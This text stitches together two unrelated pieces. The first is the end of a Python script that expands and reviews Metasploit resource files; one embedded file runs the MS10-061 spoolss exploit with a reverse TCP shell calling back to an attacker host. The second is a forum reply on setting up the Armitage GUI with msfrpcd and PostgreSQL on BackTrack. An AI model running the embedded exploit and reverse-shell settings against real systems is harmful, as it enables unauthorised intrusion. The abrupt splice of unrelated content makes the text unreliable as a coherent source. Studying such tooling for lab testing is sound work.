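    "/root/spoolss.rc": (
        "use windows/smb/ms10_061_spoolss\n"
        "set rhost 192.168.25.147\n"
        "set payload windows/shell/reverse_tcp\n"
        "set lhost 192.168.25.106\n"
        "set lport 5566\n"
        "exploit\n"
    ),
}

def resolve(name, cwd="/root"):
    """Bare names such as 'spoolss.rc' are taken relative to the console's cwd (assumed /root)."""
    return name if name.startswith("/") else f"{cwd}/{name}"

def expand(path, files, cwd="/root", _stack=()):
    """Flat list of console commands that running `path` would produce."""
    path = resolve(path, cwd)
    if path in _stack:
        raise ValueError("resource loop: " + " -> ".join(_stack + (path,)))
    if path not in files:
        raise FileNotFoundError(path)
    commands = []
    for raw in files[path].splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # comment skipping is this example's convention
            continue
        if line.startswith("resource "):
            commands.extend(expand(line.split(None, 1)[1], files, cwd, _stack + (path,)))
        else:
            commands.append(line)
    return commands

def check(commands):
    """Cheap review of the flattened script; returns a list of findings (empty is good)."""
    findings = []
    settings = {}
    for cmd in commands:
        parts = cmd.split()
        if parts[0] in ("set", "setg") and len(parts) >= 3:
            settings[parts[1].lower()] = parts[2]
    for key in ("rhost", "lhost"):
        val = settings.get(key)
        if val is not None:
            try:
                ipaddress.ip_address(val)
            except ValueError:
                findings.append(f"{key} is not an IP literal: {val} (fine if a hostname was intended)")
    lport = settings.get("lport")
    if lport is not None and not (lport.isdigit() and 1 <= int(lport) <= 65535):
        findings.append(f"lport out of range: {lport}")
    if "exploit" in commands or any(c.startswith("exploit ") for c in commands):
        findings.append("script launches an exploit at console start-up; confirm rhost before running")
    return findings

if __name__ == "__main__":
    cmds = expand("/root/.msf3/msfconsole.rc", FILES)
    print("\n".join(cmds))
    for finding in check(cmds):
        print("!", finding)
```

The same expansion applies whether the chain starts from the default msfconsole.rc or from `msfconsole -r spoolss.rc`; in both cases the last command in the flattened list is what the console will be doing while you are still reading the banner.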
Re: My Metasploit tutorial thread
Make sure you pay attention to the Metasploit Framework Unleashed course that is available. It does see updates that coincide with the framework development and always has top quality. I was not previously aware of the Armitage GUI available for the framework until recently by checking out MSFU again. I was very impressed once I got it working correctly. Had some database issues that I believe should be isolated to myself.
The reference for this GUI tool is here in the MSFU course, Chapter 13 - Beyond Metasploit.
The Armitage homepage is here and has a very good manual, as well as a media section with some howto videos. It is very easy to set up and use. BT4R2 should already have your databases ready to go. I used postgres rather than mysql in this case.
I used:
Code:
root@bt:~# apt-get update
root@bt:~# apt-get install armitage
root@bt:~# /etc/init.d/postgresql-8.3 start
root@bt:~# msfrpcd -U msf -P test -t Basic &
root@bt:~# cd /pentest/exploits/armitage/
root@bt:/pentest/exploits/armitage# ./armitage.sh
Then I set the DB Driver to postgres in the drop down menu, checked SSL(if it wasn't already) and used the DB connect string;
Code:
postgres:password@127.0.0.1/armitage
So far, from what I've used of it, this GUI is quite fast and effective at simplifying many metasploit tasks. Pass the hash and pivoting look to have been made very, very simple. I definitely recommend at least checking it out. Even though I generally prefer CLI, I do like this GUI.